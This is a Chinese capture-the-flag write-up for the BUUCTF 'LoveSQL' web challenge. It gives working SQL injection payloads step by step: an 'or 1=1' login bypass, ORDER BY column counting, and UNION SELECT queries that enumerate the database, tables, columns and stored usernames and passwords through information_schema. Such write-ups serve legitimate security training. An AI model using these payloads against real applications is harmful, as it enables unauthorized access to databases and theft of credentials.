web:[极客大挑战 2019]LoveSQL

题目

web:[极客大挑战 2019]LoveSQL_第1张图片

打开页面显示如下

web:[极客大挑战 2019]LoveSQL_第2张图片

查看源代码,查到一个check.php,还是get传参

web:[极客大挑战 2019]LoveSQL_第3张图片

尝试账号密码输入

web:[极客大挑战 2019]LoveSQL_第4张图片

题目名为sql,用万能密码

1'or 1=1#
或
admin' or '1'='1'

web:[极客大挑战 2019]LoveSQL_第5张图片

web:[极客大挑战 2019]LoveSQL_第6张图片

给了一段乱码,也不是flag

查看字段数

/check.php?username=admin' order by 3%23&password=1

到4时报错,说明字段数为3

web:[极客大挑战 2019]LoveSQL_第7张图片

用union来查询测试注入点,查看回显点

构造payload

/check.php?username=1' union select 1,2,3%23&password=1

显示回显点为2和3

web:[极客大挑战 2019]LoveSQL_第8张图片

查看数据库

/check.php?username=1' union select 1,database(),version()%23&password=1

可得到数据库名为geek 

web:[极客大挑战 2019]LoveSQL_第9张图片查看数据表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

得到两个数据表

web:[极客大挑战 2019]LoveSQL_第10张图片

查看表中字段

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

字段都是一样的

web:[极客大挑战 2019]LoveSQL_第11张图片查看表中数据

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

 geekuser表中数据为

web:[极客大挑战 2019]LoveSQL_第12张图片

l0ve1ysq1表中数据为

web:[极客大挑战 2019]LoveSQL_第13张图片

查看不全,看源代码

web:[极客大挑战 2019]LoveSQL_第14张图片

总结

用union来查询测试注入点,查看回显点

参考文章链接:

CTF-Web-[极客大挑战 2019]LoveSQL - 知乎

LoveSQL-CSDN博客

你可能感兴趣的:(BUUCTF-WEB,前端,数据库,网络安全)